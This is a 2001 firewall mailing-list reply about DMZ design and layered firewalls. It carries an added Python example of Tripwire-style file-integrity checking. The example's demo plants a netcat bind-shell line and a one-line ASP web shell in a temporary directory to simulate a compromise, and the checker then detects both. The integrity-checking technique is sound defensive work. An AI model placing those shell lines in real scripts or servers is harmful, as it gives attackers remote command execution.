RE: [FW1] Best Practice?!
In reply to #2, I am assuming your theory is that if the first firewall is somehow compromised, then having the 2nd one be a different vendor/type would perhaps add a secondary layer of protection. If you have a lot of money to burn and are willing to incur significantly more administrative overhead and complexity, it sounds like that might work. I think you might spend your time and money more wisely strengthening your single firewall and tightening your rulebase, along with good intrusion detection systems. If it were up to me, I would install two firewalls in parallel and use a Foundry switch to load balance traffic from two routers taking full internet routes, so you have good redundancy.

In reply to #1, I would not have member servers in a DMZ unless absolutely necessary. I guess it depends on your definition of "DMZ".

If you mean a network segment that is completely exposed to the internet without any rules etc., then I would suggest not running ANY servers there. Lots of these SOHO "firewalls" have no rule base and the DMZ is just wide open.

If DMZ means a network segment that has "some" access to the internet and rules defining service availability, then you might be able to run a bastion host that actually does NTLM authentication to your domain, but you should be extremely careful how this server is set up and be very careful to ensure that if/when it gets compromised it is detected quickly, and there should be a means to quickly restore it to its proper state. This means running software like tripwire/intact, rembo, etc. etc.

If DMZ means a network segment that is secured but has no access to the internet and is only used for internal security purposes, then allowing it to be a member server is less of an issue.

I don't know if I like the term DMZ. I prefer to call them "legs", and they may be separate network segments/vlans with rules defining their allowed traffic, authentication etc. You might have 3 legs, 5 legs or more depending on what your situation is.
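The reply above points at tripwire/intact-style integrity checking as the way to detect a compromised bastion host quickly and to know what to restore. The following is an added example, not code from this thread or from Tripwire, of the core technique in Python: baseline a tree's file hashes and attributes, store the baseline, and later diff a fresh scan against it. The directory layout, file contents and the "compromise" it simulates (a backdoored CGI, a dropped web shell, a deleted file) are all constructed here for the demonstration and are not taken from the original message.

```python
"""Tripwire-style file integrity baseline and verification.

Added example, not code from the original thread. It assumes a Unix-like
host and a directory tree to watch; the sample tree it builds under a
temporary directory is constructed purely for demonstration.
"""
import hashlib
import json
import os
import stat
import tempfile


def file_record(path):
    """Return the attributes we compare: SHA-256, size, permission bits, owner."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return {
        "sha256": h.hexdigest(),
        "size": st.st_size,
        "mode": stat.S_IMODE(st.st_mode),
        "uid": st.st_uid,
    }


def build_baseline(root):
    """Walk root and record every regular file, keyed by path relative to root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks and special files are out of scope here
            baseline[os.path.relpath(full, root)] = file_record(full)
    return baseline


def save_baseline(baseline, path):
    # In real use the baseline must live off-box or on read-only media: an
    # attacker who can rewrite the baseline can hide any change from the check.
    with open(path, "w") as fh:
        json.dump(baseline, fh, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)


def compare(baseline, current):
    """Diff two snapshots; returns sorted lists of added, removed and modified paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(
        p for p in set(baseline) & set(current) if baseline[p] != current[p]
    )
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Build a constructed sample web root, baseline it, tamper with it, re-check."""
    root = tempfile.mkdtemp(prefix="fim-demo-")
    os.makedirs(os.path.join(root, "cgi-bin"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html>welcome</html>\n")
    with open(os.path.join(root, "cgi-bin", "login.cgi"), "w") as fh:
        fh.write("#!/bin/sh\necho ok\n")
    with open(os.path.join(root, "robots.txt"), "w") as fh:
        fh.write("User-agent: *\n")

    # Baseline is written to a separate directory, standing in for off-box storage.
    baseline_path = os.path.join(tempfile.mkdtemp(prefix="fim-baseline-"), "baseline.json")
    save_baseline(build_baseline(root), baseline_path)

    # Simulated compromise (constructed): backdoored CGI, dropped web shell, deleted file.
    with open(os.path.join(root, "cgi-bin", "login.cgi"), "a") as fh:
        fh.write("nc -l -p 4444 -e /bin/sh\n")
    with open(os.path.join(root, "cmd.asp"), "w") as fh:
        fh.write('<% eval request("c") %>\n')
    os.remove(os.path.join(root, "robots.txt"))

    return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The report from `demo()` names exactly the three tampered paths, which is the list an operator would use both for detection and for deciding what to restore. The design point worth keeping from the original is that the baseline and the checker are only trustworthy if the compromised host cannot modify them; running them from the host's own disk defeats the purpose.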
-----Original Message-----
From: [email protected] [mailto:[email protected]] On Behalf Of Ivan Fox
Sent: Saturday, January 13, 2001 2:29 PM
To: fw-wiz; fw-1-mailinglist (e-mail)
Subject: [FW1] Best Practice?!

Are the following two items "best practices"? Your comments are appreciated.

1) All NT-based servers in a DMZ should be stand-alone servers, not member servers of an NT Domain?

2) If two firewalls are in serial, they should be of different make, for instance, Check Point on NT and Check Point on Solaris, or Check Point and PIX?!

================================================================================
To unsubscribe from this mailing list, please see the instructions at http://www.checkpoint.com/services/mailing.html
================================================================================